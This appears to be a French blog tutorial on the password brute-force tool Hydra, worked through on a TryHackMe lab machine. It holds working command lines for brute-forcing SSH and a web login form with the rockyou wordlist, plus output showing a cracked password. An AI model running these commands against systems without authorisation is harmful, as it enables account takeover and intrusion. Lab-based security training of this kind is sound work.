Aujourd’hui, nous allons à la découverte d’un “nouvel” outil, hydra. Hydra a toute sa place dans votre arsenal de hacking car c’est un puissant outil de bruteforce de mot de passes qui supporte une liste impressionnante de protocoles.
Si vous avez envie par exemple de tester la solidité du mot de passe utilisé pour la connexion à un système distant, hydra peut donc s’avérer un excellent outil pour vous permettre cela.
Nous allons apprendre dans ce tutoriel sur Hydra comment l’installer, et comment l’utiliser dans différents cas d’usage.
Hydra, c’est quoi ?
Hydra est un cracker de connexion parallélisé qui prend en charge de nombreux protocoles d’attaque. Il est très rapide et flexible, et peut être étendu grâce à des modules supplémentaires.
La liste des protocoles supportée est impressionnante, je cite: Astérisque, AFP, Cisco AAA, authentification Cisco, activation Cisco, CVS, Firebird, FTP, HTTP-FORM-GET, HTTP-FORM-POST, HTTP-GET, HTTP-HEAD, HTTP-POST, HTTP-PROXY, HTTPS-FORM -GET, HTTPS-FORM-POST, HTTPS-GET, HTTPS-HEAD, HTTPS-POST, proxy HTTP, ICQ, IMAP, IRC, LDAP, MS-SQL, MYSQL, NCP, NNTP, auditeur Oracle, Oracle SID, Oracle , PC-Anywhere, PCNFS, POP3, POSTGRES, RDP, Rexec, Rlogin, Rsh, RTSP, SAP / R3, SIP, SMB, SMTP, Enum SMTP, SNMP v1 + v2 + v3, SOCKS5, SSH (v1 et v2), SSHKEY, Subversion, Teamspeak (TS2), Telnet, VMware-Auth, VNC et XMPP.
Les différents tests que nous allons faire au cours de ce tuto, ont été réalisés dans le room hydra de tryhackme. Je vous invite donc à déployer cette machine afin d’appliquer ce qui suit et pratique ces commandes et en apprendre plus sur hydra.
Comment installer hydra si vous n’êtes pas sur kali ?
Si vous êtes sur Kali linux, vous trouverez Hydra inclus parmis les outils de la distribution.
Sinon pour l’installer il faut commencer par télécharger la dernière version du projet ici.
Ensuite décompresser le dossier, et à la racine du dossier il faut exécuter cette commande ./configure, puis la commande make,et enfin finir l’installation par la commande make install .
L’installation est maintenant terminée, et nous pouvons maintenant lancer hydra.
Comment fonctionne hydra ?
Pour que Hydra fonctionne avec un protocole, nous aurons besoin des paramètres comme :
- un nom d’utilisateur (-l) ou une liste de noms d’utilisateur (-L),
- un mot de passe (-p) ou d’une liste de mots de passe (-P)
- une adresse IP cible associée au protocole.
La syntaxe générale est
hydra -l < nom d'utilisateur > -P < mot de passe > < protocole > : // < ip >
vous pouvez également le faire de la manière suivante :
hydra -l < nom d'utilisateur > -P < mot de passe fichier de > -s < port > -V < ip > < protocole >
avec l’option -s pour le port et l’option -V pour la verbosité.
Comment utiliser hydra pour faire du brute force sur le ssh?
Si nous connaissons le nom d’utilisateur, nous allons procéder de la manière suivante.
hydra -l molly -P rockyou.txt 10.10.219.212 ssh 
sinon
hydra -L user.txt -P rockyou.txt 10.10.219.212 ssh
Comment utiliser hydra sur un formulaire web?
Pour faire du bruteforce avec hydra sur une formulaire web,il faudra utiliser la syntaxe suivantehydra -l -P http-post-form "{lien vers la page de connexion}:{les paramètres du formulaire}:F={message a rechercher sur la page si la connexion échoue}".
Dans notre cas l’adresse de la cible est http://10.10.219.212/login, le message d’erreut est “Your password is incorrect”, et enfin les paramètres de la requête que nous avons pu avoir grâce a l’option réseau du web develloper de firefox.
La commande finale donne:
hydra -l molly -P rockyou.txt 10.10.219.212 http-post-form "/login:username=^USER^&password=^PASS^:F=Your password is incorrect" -V. Résultat…
[80][http-post-form] host: 10.10.219.212 login: molly password: sunshine
1 of 1 target successfully completed, 1 valid password foundOn obtient donc notre mot de passe.
Conclusion
En dehors des protocoles que nous avons utilisé pour l’article et les différentes options cités, hydra peut être utilisé de diverses manières. Il dispose de plusieurs autres options pour optimiser son exécution et gagner en efficacité. Tout dépendra du contexte dans lequel vous allez l’utiliser…
Voila donc pour cette introduction.
À bientôt pour encore plus d’astuces.
